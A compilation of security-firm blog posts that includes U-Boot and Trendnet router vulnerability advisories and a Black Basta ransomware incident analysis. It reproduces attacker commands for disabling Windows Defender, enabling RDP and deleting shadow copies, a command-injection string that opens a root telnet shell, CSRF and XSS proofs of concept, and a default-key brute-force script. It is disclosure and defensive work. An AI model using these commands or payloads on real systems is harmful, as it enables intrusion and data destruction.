The focus of this discussion is specific to the ESP32, so more general topics like trusted device identity and secure communication with other endpoints are not covered. They are however similarly critical in embedded device security and warrant similar prioritized consideration. Furthermore, many of the topics discussed above apply to the general best practices of embedded device security regardless of SoC choice. The details however will vary in their design, level of support, and public transparency. Few of these topics are straightforward, and it has taken generations of iteration for such features to be made available and hardened by SoC vendors. In cases where the SoC vendor does not provide guidance on how to address a particular security requirement, it is often left to the OEM to implement in firmware, which can present a greater likelihood of vulnerability due to the comparative lack of oversight and scrutiny that product-specific designs and implementations are given.

Public Report – Lantern and Replica Security Assessment

31 May 2022 at 18:45
Editor's Note: This security assessment was conducted by a team of our consultants, one of whom, Victor Hora, tragically and unexpectedly passed away a few weeks ago. As we publish this report, we miss our dear colleague immensely and celebrate Victor's life and his wonderful influence on the world. He was a talented security consultant, beloved colleague, and friend to all, who made the world a better place through his kindness, his joy, and - as we see in this publication - his commitment to using his deep technical talents to help serve others and protect the most vulnerable. May his memory serve as an everlasting reminder of the many ways our joy and talent can be used to help others and leave the world a better place than we found it. 


From September 28th through October 23rd, 2020, Lantern – in partnership with the Open Technology Fund – engaged NCC Group to conduct a security assessment of the Lantern client. Lantern provides a proxy in order to circumvent internet censorship. This assessment was open ended and time-boxed, providing a best-effort security analysis in a fixed amount of time. Source code was provided to the engagement team.

In the winter of 2022, NCC Group was asked to re-evaluate several findings after remediation efforts had been completed for Lantern, which are also included in this Public Report.

Scope & Limitations

NCC Group’s evaluation included:

  • Lantern Common Core: The main component of the software is the cross-platform Lantern core. The core is written principally in Go with some components in other languages, including C, C++, Objective-C, and JavaScript. Testing was performed on the Windows, Android, and iOS client implementations.
  • Replica: A new component within Lantern which is a censorship-resistant P2P content sharing platform. Replica leverages the BitTorrent protocol to provide distributed data access. The following third-party libraries are used to provide BitTorrent functionality:
    https://github.com/anacrolix/torrent
    https://github.com/anacrolix/confluence

This application is intended for use in countries where the Internet is censored and therefore its threat model includes risks related to attribution and privacy attacks beyond just software security vulnerabilities. Included in that threat model are well-resourced attackers with advanced capabilities such as reading or modifying HTTP/HTTPS traffic unbeknownst to the targets. Testing was performed on a production version of the client made available at https://getlantern.org/.

NCC Group achieved adequate coverage of the Go code, which forms the backbone of the Lantern client. Some related components were not evaluated:

  • Server-side components were not in scope for the assessment.
  • The project relies on many third-party libraries. These libraries were not thoroughly evaluated.

The Public Report for this review may be downloaded below:

Conference Talks – June 2022

31 May 2022 at 23:59

This month, members of NCC Group will be presenting their technical work & training courses at the following conferences:

  • NCC Group, “Training: Mastering Container Security,” to be presented at 44CON (June 13-15 2022)
  • NCC Group, “Training: Google Cloud Platform (GCP) Security Review,” to be presented at 44CON (June 13-16 2022)
  • Jennifer Fernick (NCC Group), Christopher Robinson (Intel), & Anne Bertucio (Google), “Preparing for Zero-Day: Vulnerability Disclosure in Open Source Software”, to be presented at Linux Security Summit North America (June 23-24 2022)
  • Jennifer Fernick (NCC Group) & Christopher Robinson (Intel), “Securing Open Source Software – End-to-End, at Massive Scale, Together,” to be presented at the Open Source Summit North America 2022 – Global Security Vulnerability Summit (June 23-24 2022)
  • Jose Selvi, “Cybersecurity, Intrusion Detection, & Machine Learning,” to be presented at Valencia 2022 Summer School – Challenges in Data Science: Big Data, Biostatistics, Artificial Intelligence, & Communications (June 27-July 1 2022)

Please join us!

Training: Mastering Container Security
NCC Group
44CON
June 13-15 2022

Containers and container orchestration platforms such as Kubernetes are on the rise throughout the IT world, but how do they really work and how can you attack or secure them?

This course takes a deep dive into the world of Linux containers, covering fundamental technologies and practical approaches to attacking and defending container-based systems such as Docker and Kubernetes.

In the 2022 version of the course, the trainers will focus more on Kubernetes, as it emerges as the dominant core of cloud-native systems, and will look at the wider ecosystem of products used in conjunction with Kubernetes.


Training: Google Cloud Platform (GCP) Security Review
NCC Group
44CON
June 13-16 2022


Ever more enterprises are moving their operations to the cloud, with customer adoption of Google Cloud Platform (GCP) steadily increasing. How can you ensure your cloud environment is secure?

NCC Group’s GCP security review training is a four-day course dedicated to security consultants and cloud architects interested in learning the principal elements of an environment based in Google’s cloud. It will discuss the techniques and tools necessary to perform a thorough security review and provide an understanding of the major risks, along with security best practices.

The course includes:

  • An introduction to GCP for people new to the platform, including general concepts and a comparison with other cloud providers
  • How to interact with GCP through the Cloud Console, CLI tool and SDK
  • An extensive discussion on the Identity and Access Management services with samples of policies and interesting attack vectors
  • A review of networking in GCP, including typical topologies and common issues
  • A detailed look at the core services for computation, storage, databases, security and logging & monitoring
  • Tools which can help assess and secure GCP deployments


Preparing for Zero-Day: Vulnerability Disclosure in Open Source Software
Jennifer Fernick (NCC Group), Christopher Robinson (Intel), & Anne Bertucio (Google)
Linux Security Summit North America
June 23-24 2022

Open source software (OSS) is incredibly powerful – and while that power is often used for good, it can be weaponized when OSS projects contain software security flaws that attackers can use to compromise those systems, or even the entire software supply chains that those systems are a part of. The Open Source Security Foundation is an open, cross-industry group aimed at improving the security of the open source ecosystem. In this presentation, members of the OpenSSF Vulnerability Disclosure working group will be sharing with open-source maintainers advice on how to handle when researchers disclose vulnerabilities in your project’s codebase – and we’ll also take any questions you have about this often mysterious topic!


Securing Open Source Software – End-to-End, at Massive Scale, Together
Jennifer Fernick (NCC Group) & Christopher Robinson (Intel)
Open Source Summit North America 2022 – Global Security Vulnerability Summit
June 23-24 2022 (Austin, TX & Virtual)

Open source software is a significant part of the core infrastructure in most enterprises in most sectors around the world and is foundational to the internet as we know it. It also represents a massive and profoundly valuable attack surface. Each year more lines of source code are created than ever before – and along with them, vulnerabilities. In this presentation, we’ll share key lessons learned in our experience coordinating the industry-wide remediation of some of the most impactful vulnerabilities ever disclosed, present a threat model of the many unmitigated challenges to securing the open source ecosystem, share new data which illustrates just how fragile and interdependent the security of our core infrastructure can be, debate the challenges to securing OSS at scale, and speak unspoken truths of coordinated disclosure and where it can fail. We will also discuss the Open Source Security Foundation (OpenSSF) and share guidance for how members of the security community can get involved and contribute meaningfully to improving the security of OSS – especially through coordinated industry-wide efforts.


Cybersecurity, Intrusion Detection, & Machine Learning
Jose Selvi (NCC Group)

Valencia 2022 Summer School – Challenges in Data Science: Big Data, Biostatistics, Artificial Intelligence, & Communications
June 27-July 1 2022

The cybersecurity industry is facing many new challenges related to the amount of data it has to manage. In the “at scale” era, the traditional signature-based approach is no longer a solution by itself. In this talk, we will see an example of how machine learning can be used to reduce false positives in intrusion detection systems.

NCC Group’s Jeremy Boone recognized for Highest Quality and Most Eligible Reports through the Intel Circuit Breaker program

2 June 2022 at 13:33

Congratulations to NCC Group researcher Jeremy Boone, who was recently recognized for both the Highest Quality Report, as well as the Most Eligible Reports, as an invited researcher to the Intel Circuit Breaker program!

Source: https://www.projectcircuitbreaker.com/camping-with-tigers/


From Intel:

This exclusive event invited a select group of security researchers to hunt vulnerabilities in the 11th Gen Intel® Core™ vPro® platform. Potential findings might involve any of the following:

  • Micro-architectural attacks
  • Firmware attacks like microcode
  • Platform configuration (Intel® vPro, Intel® Management Engine, etc.)
  • Platform design
  • Physical attacks (note that this is a deviation from our existing Bug Bounty policy)
  • Firmware attacks
  • Physical: I/O, storage, flash, memory, sensors, embedded controller, trusted platform module
  • Firmware: BIOS, IP firmware components, embedded controller, sensor, trusted platform module, storage, flash storage
  • Device drivers shipped with the device (such as Intel graphics drivers, Thunderbolt device drivers, Bluetooth device drivers, wireless drivers, ethernet drivers, chipset driver)



Jeremy Boone is a Technical Director in our Hardware & Embedded Systems practice, serving as mentor and leader to researchers across our hardware research program. He is perhaps best known for his research, TPM Genie, an I2C bus interposer for discrete Trusted Platform Modules.

Congratulations Jeremy!

Technical Advisory – Multiple Vulnerabilities in U-Boot (CVE-2022-30790, CVE-2022-30552)

3 June 2022 at 18:50

By Nicolas Bidron, and Nicolas Guigo.

U-Boot is a popular boot loader for embedded systems, with implementations for a large number of architectures, and is prominent in most Linux-based embedded systems such as ChromeOS and Android devices.

Two vulnerabilities were uncovered in the IP Defragmentation algorithm implemented in U-Boot, with the associated technical advisories below:

  • Technical Advisory – Hole Descriptor Overwrite in U-Boot IP Packet Defragmentation Leads to Arbitrary Out of Bounds Write Primitive (CVE-2022-30790)
  • Technical Advisory – Large buffer overflow leads to DoS in U-Boot IP Packet Defragmentation Code (CVE-2022-30552)

Proof of concept code will be made available once the fixes have been published.

Technical Advisories:

Hole Descriptor Overwrite in U-Boot IP Packet Defragmentation Leads to Arbitrary Out of Bounds Write Primitive (CVE-2022-30790)

Project U-Boot
Project URL https://github.com/u-boot/u-boot
Versions affected all versions up to commit TBD
Systems affected All systems defining CONFIG_IP_DEFRAG
CVE identifier CVE-2022-30790
Advisory URL TBD
Risk Critical 9.6 (CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)
Authors Nicolas Guigo, Nicolas Bidron

Summary

U-Boot is a popular boot loader for embedded systems, with implementations for a large number of architectures, and is prominent in most Linux-based embedded systems.

Location

In u-boot/net/net.c, the __net_defragment function, lines 900 through 1018.

Impact

The U-Boot implementation of RFC815 IP DATAGRAM REASSEMBLY ALGORITHMS is susceptible to a Hole Descriptor overwrite attack which ultimately leads to an arbitrary write primitive.

Description

In compiled versions of U-Boot that define CONFIG_IP_DEFRAG, a value of ip->ip_len (the IP packet header’s Total Length) higher than IP_HDR_SIZE and strictly lower than IP_HDR_SIZE+8 leads to a value of len between 0 and 7. This ultimately results in a truncated division by 8 yielding 0, which forces the hole metadata and the fragment to point to the same location. The subsequent memcpy then overwrites the hole metadata with the fragment data. Through a second fragment, this attacker-controlled metadata can be exploited to perform a controlled write to an arbitrary offset.

This bug is only exploitable from the local network, as it requires crafting a malformed packet which would most likely be dropped during routing. However, it can be effectively leveraged to root Linux-based embedded devices locally.

static struct ip_udp_hdr *__net_defragment(struct ip_udp_hdr *ip, int *lenp)
{
	static uchar pkt_buff[IP_PKTSIZE] __aligned(PKTALIGN);
	static u16 first_hole, total_len;
	struct hole *payload, *thisfrag, *h, *newh;
	struct ip_udp_hdr *localip = (struct ip_udp_hdr *)pkt_buff;
	uchar *indata = (uchar *)ip;
	int offset8, start, len, done = 0;
	u16 ip_off = ntohs(ip->ip_off);

	/* payload starts after IP header, this fragment is in there */
	payload = (struct hole *)(pkt_buff + IP_HDR_SIZE);
	offset8 =  (ip_off & IP_OFFS);
	thisfrag = payload + offset8;
	start = offset8 * 8;
	len = ntohs(ip->ip_len) - IP_HDR_SIZE;

The last line of the previous excerpt from u-boot/net/net.c shows how the attacker can control the value of len to be strictly lower than 8 by issuing a packet with ip_len between 21 and 27 (IP_HDR_SIZE has a value of 20).

Also note that offset8 here is 0 which leads to thisfrag = payload.

	} else if (h >= thisfrag) {
		/* overlaps with initial part of the hole: move this hole */
		newh = thisfrag + (len / 8);
		*newh = *h;
		h = newh;
		if (h->next_hole)
			payload[h->next_hole].prev_hole = (h - payload);
		if (h->prev_hole)
			payload[h->prev_hole].next_hole = (h - payload);
		else
			first_hole = (h - payload);

	} else {

Later in the same function, execution reaches the above code path. Here, len / 8 evaluates to 0, leading to newh = thisfrag. Also note that first_hole here is 0, since h and payload point to the same location.

	/* finally copy this fragment and possibly return whole packet */
	memcpy((uchar *)thisfrag, indata + IP_HDR_SIZE, len);

In the above excerpt, the call to memcpy() overwrites the hole metadata (since thisfrag and h both point to the same location) with arbitrary data from the fragmented IP packet. With a len value of 6, the last_byte, next_hole, and prev_hole fields of the first hole all end up attacker-controlled.

Finally the arbitrary write is triggered by sending a second fragment packet, whose offset and length only need to fit within the hole pointed to by the previously controlled metadata (next_hole) set from the first packet.

Recommendation

This bug was disclosed to U-Boot support team and will be fixed in an upcoming patch. Update to the latest master branch version once the fix has been committed.

Large buffer overflow leads to DoS in U-Boot IP Packet Defragmentation Code (CVE-2022-30552)

Project U-Boot
Project URL https://github.com/u-boot/u-boot
Versions affected all versions up to commit TBD
Systems affected All systems defining CONFIG_IP_DEFRAG
CVE identifier CVE-2022-30552
Advisory URL TBD
Risk High 7.1 (CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H)
Authors Nicolas Guigo, Nicolas Bidron

Summary

U-Boot is a popular boot loader for embedded systems, with implementations for a large number of architectures, and is prominent in most Linux-based embedded systems.

Location

u-boot/net/net.c lines 915 and 1011.

Impact

The U-Boot implementation of RFC815 IP DATAGRAM REASSEMBLY ALGORITHMS is susceptible to a buffer overflow through a specially crafted fragmented IP Datagram with an invalid total length which causes a denial of service.

Description

In compiled versions of U-Boot that define CONFIG_IP_DEFRAG, a value of ip->ip_len (IP packet header’s total length) lower than IP_HDR_SIZE leads to len taking a negative value, which ultimately results in a buffer overflow during the subsequent call to memcpy() that uses len as its count parameter.

This bug is only exploitable from the local network, as it requires crafting a malformed packet with an ip_len value lower than the minimum accepted total length (21, as defined in the IP specification, RFC 791), which would most likely be dropped during routing.

static struct ip_udp_hdr *__net_defragment(struct ip_udp_hdr *ip, int *lenp)
{
	static uchar pkt_buff[IP_PKTSIZE] __aligned(PKTALIGN);
	static u16 first_hole, total_len;
	struct hole *payload, *thisfrag, *h, *newh;
	struct ip_udp_hdr *localip = (struct ip_udp_hdr *)pkt_buff;
	uchar *indata = (uchar *)ip;
	int offset8, start, len, done = 0;
	u16 ip_off = ntohs(ip->ip_off);

	/* payload starts after IP header, this fragment is in there */
	payload = (struct hole *)(pkt_buff + IP_HDR_SIZE);
	offset8 =  (ip_off & IP_OFFS);
	thisfrag = payload + offset8;
	start = offset8 * 8;
	len = ntohs(ip->ip_len) - IP_HDR_SIZE;

The last line of the previous excerpt from u-boot/net/net.c shows where the underflow to a negative len value occurs if ip_len is set to a value strictly lower than 20 (IP_HDR_SIZE being 20). Also note that the pkt_buff buffer has a size of CONFIG_NET_MAXDEFRAG, which defaults to 16 KB but can range from 1 KB to 64 KB depending on configuration.

	/* finally copy this fragment and possibly return whole packet */
	memcpy((uchar *)thisfrag, indata + IP_HDR_SIZE, len);

In the above excerpt, the memcpy() overflows the destination by attempting to copy nearly 4 gigabytes into a buffer designed to hold at most CONFIG_NET_MAXDEFRAG bytes, which leads to a DoS.

Recommendation

This bug was disclosed to U-Boot support team and will be fixed in an upcoming patch. Update to the latest master branch version once the fix has been committed.

Disclosure Timeline

May 18th 2022: Initial e-mail from NCC Group to U-Boot maintainers announcing that two vulnerabilities had been identified. U-Boot maintainers responded indicating that the disclosure process is to be handled publicly through U-Boot’s mailing list.

May 18th 2022: NCC Group posted a full write-up of the two vulnerabilities to U-Boot’s public mailing list.

May 25th 2022: A U-Boot maintainer indicated on the mailing list that they would implement a fix for the two findings.

May 26th 2022: A patch was proposed by U-Boot maintainers through the mailing list to fix both CVEs.

May 31st 2022: U-Boot maintainers and NCC Group agreed to publish the advisories in advance of patch deployment, given the public mailing-list discussion of the vulnerability and proposed fixes.

Thanks to

Jennifer Fernick, and Dave Goldsmith for their support through the disclosure process.

U-Boot’s maintainers.

Authors

Nicolas Guigo, and Nicolas Bidron

Shining the Light on Black Basta

Authored by: Ross Inman (@rdi_x64) and Peter Gurney

Summary

tl;dr

This blog post documents some of the TTPs employed by a threat actor group who were observed deploying Black Basta ransomware during a recent incident response engagement, as well as a breakdown of the executable file which performs the encryption.

A summary of the findings can be found below:

  • Lateral movement through use of Qakbot.
  • Gathering internal IP addresses of all hosts on the network.
  • Disabling Windows Defender.
  • Deleting Veeam backups from Hyper-V servers.
  • Use of WMI to push out the ransomware.
  • Technical analysis of the ransomware executable.

Black Basta

Black Basta are a ransomware group who have recently emerged, with the first public reports of attacks occurring in April this year. As is popular with other ransomware groups, Black Basta uses double-extortion attacks where data is first exfiltrated from the network before the ransomware is deployed. The threat actor then threatens to leak the data on the “Black Basta Blog” or “Basta News” Tor site. There are two Tor sites used by Black Basta, one which leaks stolen data and one which the victims can use to contact the ransomware operators. The latter site is provided in the ransom note which is dropped by the ransomware executable.

Black Basta TTPs

Lateral Movement

Black Basta was observed using the following methods to laterally move throughout the network after their initial access had been gained:

  • PsExec.exe which was created in the C:\Windows\ folder.
  • Qakbot was leveraged to remotely create a temporary service on a target host which was configured to execute a Qakbot DLL using regsvr32.exe:
    • regsvr32.exe -s \\<IP address of compromised Domain Controller>\SYSVOL\<random string>.dll
  • RDP along with the deployment of a batch file called rdp.bat which contained command lines to enable RDP logons. This was used to allow the threat actor to establish remote desktop sessions on compromised hosts, even if RDP was disabled originally:
    • reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
    • net start MpsSvc
    • netsh advfirewall firewall set rule group="Remote Desktop" new enable=yes
    • reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "UserAuthentication" /t REG_DWORD /d 0 /f

Defense Evasion

During the intrusion, steps were taken by the threat actor in order to prevent interference from anti-virus. The threat actor was observed using two main techniques to disable Windows Defender.

The first used the batch script d.bat which was deployed locally on compromised hosts and executed the following PowerShell commands:

  • powershell -ExecutionPolicy Bypass -command "New-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force"
  • powershell -ExecutionPolicy Bypass -command "Set-MpPreference -DisableRealtimeMonitoring 1"
  • powershell -ExecutionPolicy Bypass Uninstall-WindowsFeature -Name Windows-Defender

The second technique involved creating a GPO (Group Policy Object) on a compromised Domain Controller which would push out the below changes to the Windows Registry of domain-joined hosts:

Figure 1 Parsed Registry.pol of the created GPO

Discovery

A text file in the C:\Windows\ folder named pc_list.txt was present on two compromised Domain Controllers, both contained a list of internal IP addresses of all the systems on the network. This was to supply the threat actor with a list of IP addresses to target when deploying the ransomware. 

Command and Control

Qakbot was the primary method utilised by the threat actor to maintain their presence on the network. The threat actor was also observed using Cobalt Strike beacons during the compromise.

Impact

Prior to the deployment of the ransomware, the threat actor established RDP sessions to Hyper-V servers and from there modified configurations for the Veeam backup jobs and deleted the backups of the hosted virtual machines.

An encoded PowerShell command was observed on one of the compromised Domain Controllers which, when decoded, yielded a script labelled as Invoke-TotalExec that provided the ability to spread and execute files over the network using WMI (Windows Management Instrumentation). The script appears to have been run to push out the ransomware binary to the IP addresses contained within the file C:\Windows\pc_list.txt. Analysis of the script indicates that two log files are created:

  • C:\Windows\Temp\log.info – Contains log entries for successful attempts.
  • C:\Windows\Temp\log.dat – Contains log entries for unsuccessful attempts.

For the incident investigated by NCC Group CIRT, only the latter log file contained data. The log file contained entries relating to failed uploads for all the IP addresses in pc_list.txt, indicating that the threat actor attempted to deploy the ransomware executable across all hosts on the network but failed. Despite this, the ransomware was still deployed to the Hyper-V servers and the Domain Controllers.

Recommendations

  1. Hypervisors should be isolated by placing them in a separate domain or by adding them to a workgroup to ensure that any compromise in the domain in which the hosted virtual machines reside does not pose any risk to the Hypervisors.
  2. Ensure that both online and offline backups are taken and test the backup strategy regularly to identify any weak points that could be exploited by an adversary.
  3. Restrict internal RDP and SMB traffic ensuring only hosts that are required to communicate via these protocols are allowed to.

Indicators of Compromise

  • 23.106.160[.]188 (IP address) – Cobalt Strike command-and-control server
  • eb43350337138f2a77593c79cee1439217d02957 (SHA1) – Batch script which enabled RDP on the host (rdp.bat)
  • 920fe42b1bd69804080f904f0426ed784a8ebbc2 (SHA1) – Batch script to disable Windows Defender (d.bat)
  • C:\Windows\PsExec.exe (Filename) – PsExec
  • C:\Windows\SYSVOL\sysvol\<random string>.dll (Filename) – Qakbot payload
  • C:\Windows\Temp\log.info, C:\Windows\Temp\log.dat (Filenames) – Invoke-TotalExec output log files

Ransomware Technical Analysis 

Shadow Copy Deletion 

Upon execution, Black Basta performs several operations before launching its encryption activities. 

The mutex ‘dsajdhas.0’ is checked before issuing the two vssadmin.exe commands listed below. Although the mutex is static in this sample, it is expected to change across future samples.

C:\\Windows\\SysNative\\vssadmin.exe delete shadows /all /quiet 
C:\\Windows\\System32\\vssadmin.exe delete shadows /all /quiet 

These result in the deletion of shadow copies ensuring they cannot be used for recovery purposes. 

Wallpaper icon modification 

Following deletion of the shadow copies, two files are extracted from the binary. The first is a JPG file, saved in the currently analysed sample as ‘dlaksjdoiwq.jpg’, which is used as the wallpaper on targeted devices. The image used can be seen below in Figure 2.

Figure 2 Desktop wallpaper image 

The second dropped file is an icon file extracted from within the binary and used as the default icon for all files with the extension .basta. In the currently analysed sample, the file is saved with the name fkdjsadasd.ico within the %Temp% directory, for example:

C:\Users\{Username}\AppData\Local\Temp 

The icon used can be seen below in Figure 3. 

Figure 3 Basta icon 

The wallpaper is modified to display the dropped JPG through the registry value located at HKCU\Control Panel\Desktop\Wallpaper, setting the path to the JPG as seen below in Figure 4.

Figure 4 String de-obfuscation example 

The next operation creates a new registry key with the name .basta under HKEY_CLASSES_ROOT and sets the DefaultIcon subkey to display the dropped .ico file. This results in files given a .basta file extension inheriting the Black Basta logo. The registry key can be seen below in Figure 5. 

Figure 5 Desktop wallpaper image 

Ransom Note 

The ransomware note is stored within the binary and written to a text file named readme.txt, as shown in Figure 6. This file is written to folders throughout the system. The content comprises a standard Black Basta template with a URL to a Tor site where victims can negotiate with operators. 

A company ID is also present, which varies between compromises. 

Figure 6 Ransom Note 

Exclusions 

In an attempt to avoid encrypting files or folders that are likely essential to the operation of the target machine or of Black Basta itself, several exclusions are in place that prevent specific files from being encrypted. These include the extensions, folders and files listed below.

Extension exclusions: 

  • exe 
  • cmd 
  • bat 
  • com 
  • basta 

File/folder exclusions: 

  • $Recycle.Bin 
  • Windows 
  • Documents and Settings 
  • Local Settings 
  • Application Data
  • OUT.txt
  • Boot
  • Readme.txt
  • Dlaksjdoiwq.jpg
  • NTUSER.DAT
  • fkdjsadasd.ico

A copy of the ransom note is placed in each eligible folder found, and suitable files discovered within the folder are passed for encryption. 

Encryption 

Several threads are created that are responsible for performing the encryption activity. Each file that is not skipped by the previously mentioned exclusions is encrypted using the ChaCha20 cypher. 

The encryption key is generated using the C++ rand_s function resulting in a random 40-byte hexadecimal output.  

Figure 7 Random generation output 

The first 32 bytes are used as the ChaCha20 encryption key. 

Figure 8 Encryption key 

The last 8 bytes are used as the ChaCha20 nonce. 

Figure 9 Nonce 

The encryption key is encrypted using an implementation of RSA provided through the Mini GMP library. A public key is obtained from the binary that results in an output similar to the below output in Figure 10. 

Figure 10 Encrypted encryption key 

Black Basta, as with many ransomware variants, doesn’t encrypt the entire file; instead it encrypts only part of each file to increase the speed and efficiency of encryption. Black Basta achieves this by encrypting only 64-byte blocks of a file, interspaced with 128 unencrypted bytes. This can be seen in Figure 11 below, where the first two encrypted data blocks are shown.

Figure 11 Example encrypted file 

To further demonstrate this, an unencrypted version of the file can be seen below in Figure 12. 

Figure 12 Example of the unencrypted file 

Finally, the RSA-encrypted key generated earlier and the value 0x00020000 are appended to the end of the file, to be used for decryption purposes. 

Figure 13 appended encrypted key and hex 

Following successful encryption of a file, its extension is changed to .basta, which automatically changes its icon to the earlier dropped icon file. An example of what a victim would be presented with can be seen below in Figure 14. 

Figure 14 Example post-encryption desktop 

While the ransom note threatens victims with the publication of data if the ransom is not paid, initial analysis has not uncovered an exfiltration mechanism. With access to the private-key counterpart of the public key used earlier, the operators should be able to recover the ChaCha20 encryption key, allowing file decryption. No weakness in the encryption was discovered during analysis that would allow decryption without the private RSA key. 

Technical Advisory – Multiple Vulnerabilities in Trendnet TEW-831DR WiFi Router (CVE-2022-30325, CVE-2022-30326, CVE-2022-30327, CVE-2022-30328, CVE-2022-30329)

10 June 2022 at 18:29

The Trendnet TEW-831DR WiFi Router was found to have multiple vulnerabilities exposing the owners of the router to potential intrusion of their local WiFi network and possible takeover of the device.

Five vulnerabilities were discovered. Below are links to the associated technical advisories:

Technical Advisories:

Stored XSS in Web Interface for Trendnet TEW-831DR WiFi router (CVE-2022-30326)

Vendor: Trendnet
Vendor URL: https://www.trendnet.com/
Versions affected: All Versions
System Affected: TEW-831DR
CVE Identifier: CVE-2022-30326
Severity: Medium 5.0

Summary

Trendnet TEW-831DR is a WiFi router with a web interface for configuration. It was found that the network pre-shared key field on the web interface is vulnerable to XSS.

Impact

An attacker can use a simple XSS payload to crash the main page of the router web interface.

Details

Stored XSS is a vulnerability related to improper validation of user input and output. In stored XSS, the web interface accepts input from the user and stores it without proper encoding. A web application that is vulnerable to XSS allows an attacker to deliver a malicious script to the user.

The example below will crash the basic_conf page and create a popup on the 5G home.htm page:

<input type="text" name="pskValue0" id="pskValue0" size="30" maxlength="64" value="<script>alert(1)</script>">

Recommendation

This issue was fixed on the newest version of the firmware published by Trendnet, v1.0(601.130.1.1410). Owners of the vulnerable devices should update to the latest firmware through the web interface of the router to prevent exploitation of this bug.

Lack of Current Password Verification for Password/Username Change Feature (CVE-2022-30328)

Vendor: Trendnet
Vendor URL: https://www.trendnet.com/
Versions affected: All Versions
System Affected: TEW-831DR
CVE Identifier: CVE-2022-30328
Severity: Medium 4.0

Summary

Trendnet TEW-831DR is a WiFi router with a web interface for configuration. It was found that the router web interface has an insecure username and password setup.

Impact

A malicious user can change the username and password of the interface.

Details

The username and password setup for the router web interface does not require entering the existing password. An attacker can use CSRF to trick the user into sending a request to the web interface that changes the username and password of the router.

Recommendation

Trendnet indicated that this CVE will not be fixed at this point. Router owners should log out of the device web interface after use.

OS Command Injection in Trendnet TEW-831DR WiFi router (CVE-2022-30329)

Vendor: Trendnet
Vendor URL: https://www.trendnet.com/
Versions affected: All Versions
System Affected: TEW-831DR
CVE Identifier: CVE-2022-30329
Severity: Medium 6.3

Summary

Trendnet TEW-831DR is a WiFi router with a web interface for configuration. It was found that commands could be injected into the diagnostics field within the web interface.

Impact

An OS command injection vulnerability was found within the web interface of the device, allowing an attacker with valid credentials to execute arbitrary shell commands.

Details

The web interface has a diagnostics page that runs ping/traceroute. In the host (domain) field, an attacker can enter an IP address followed by a semicolon (;) and inject a command to be executed by the device. Using command injection, telnetd, a remote terminal (Telnet) server, can be enabled.

For example, the following can be entered into the host (domain) field to enable telnetd:

192.168.10.02;telnetd &

After running the command, any telnet client can be used to log in to the root account from the local area network (LAN):

user: root
Password: the admin password 

Running the ls command will list the files in the current directory:

bin   etc   init  mnt   root  tmp   var
dev   home  lib   proc  sys   usr   web
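The flaw follows the classic pattern of concatenating user input into a shell command line. The sketch below models it in Python purely for illustration (the firmware's actual code is not public, and the function names here are hypothetical):

```python
import shlex

def build_ping_command(host):
    # Vulnerable pattern: user input concatenated straight into a shell command.
    return "ping -c 4 " + host

payload = "192.168.10.02;telnetd &"

# The ';' terminates the ping command, so the shell also runs 'telnetd &'.
print(build_ping_command(payload))

def build_ping_command_safe(host):
    # Quoting the argument (or using exec-style APIs) prevents the injection.
    return "ping -c 4 " + shlex.quote(host)

print(build_ping_command_safe(payload))
```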

Recommendation

This issue was fixed in the newest version of the firmware published by Trendnet, v1.0(601.130.1.1410). Owners of the vulnerable devices should update to the latest firmware through the web interface of the router to prevent exploitation of this bug.

CSRF Vulnerability for Trendnet TEW-831DR WiFi router (CVE-2022-30327)

Vendor: Trendnet
Vendor URL: https://www.trendnet.com/
Versions affected: All Versions
System Affected: TEW-831DR
CVE Identifier: CVE-2022-30327
Severity: High 7.6

Summary

Trendnet TEW-831DR is a general consumer WiFi router with a web interface for configuration. It was found that the router's web interface is vulnerable to CSRF.

Impact

The WiFi router interface is vulnerable to CSRF. An attacker can change the pre-shared key of the WiFi router if the interface IP address is known.

Details

Cross-Site Request Forgery (CSRF) is an attack that occurs when a user interacts with a malicious web application while logged into a vulnerable web application in the same browser. The malicious web application can then send unwanted requests to the vulnerable web application on the user's behalf.

If the user is logged into the router web interface, an attacker could create a page like the example below and trick the user into visiting it to change the router's WiFi pre-shared key or SSID.

e.g.:

<html>
  <!-- CSRF Template -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.10.1/boafrm/formWizard" method="POST">

      <input type="hidden" name="pskValue0" value="password" />
      <input type="hidden" name="pskValue1" value="password" />
      <input type="hidden" name="cliPskValue0" value="password" />
      <input type="hidden" name="cliPskValue1" value="password" />
      <input type="hidden" name="apply" value="Save &amp; Apply" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Recommendation

This issue was fixed in the newest version of the firmware published by Trendnet, v1.0(601.130.1.1410). Owners of the vulnerable devices should update to the latest firmware through the web interface of the router to prevent exploitation of this bug.

Weak Default Pre-Shared Key for Trendnet TEW-831DR WiFi Router (CVE-2022-30325)

Vendor: Trendnet
Vendor URL: https://www.trendnet.com/
Versions affected: All Versions
System Affected: TEW-831DR
CVE Identifier: CVE-2022-30325
Severity: Medium 4.0

Summary

Trendnet TEW-831DR is a WiFi router with a web interface for configuration. It was found that the default pre-shared key for the WiFi networks is identical for every router apart from the last four digits.

Impact

The device default pre-shared key for both 2.4GHz and 5GHz networks can be guessed or brute-forced by an attacker within range of the WiFi network. The weak pre-shared key allows the attacker to gain access to these networks if the pre-shared key has been left unchanged from the factory default.

Details

The device default pre-shared key shares the same seven out of eleven characters on every router. An attacker within scanning range of the WiFi network can brute-force the last four digits to gain access to the network.

e.g.:

The first seven default characters of the pre-shared key:
831R100
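Because only the last four digits vary, the entire key space is trivially enumerable. A short Python sketch using the seven-character prefix above:

```python
from itertools import product

PREFIX = "831R100"  # first seven characters, shared by every unit

# Only the last four digits vary, so the whole key space is tiny.
candidates = [PREFIX + "".join(d) for d in product("0123456789", repeat=4)]

print(len(candidates))  # 10,000 keys in total
```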

Recommendation

Trendnet indicated that this CVE will not be fixed at this point. Router owners that are still using the default pre-shared key should change it to a new one through the web interface.

Disclosure Timeline:

March 15th, 2022: Initial email from NCC to Trendnet.

March 16th, 2022: Trendnet responded to the initial email.

March 18th, 2022: First communication of the bugs to Trendnet. Set the disclosure timeline to 60 days.

May 5th – May 23rd, 2022: Multiple emails exchanged to complete the fixes on the firmware version.

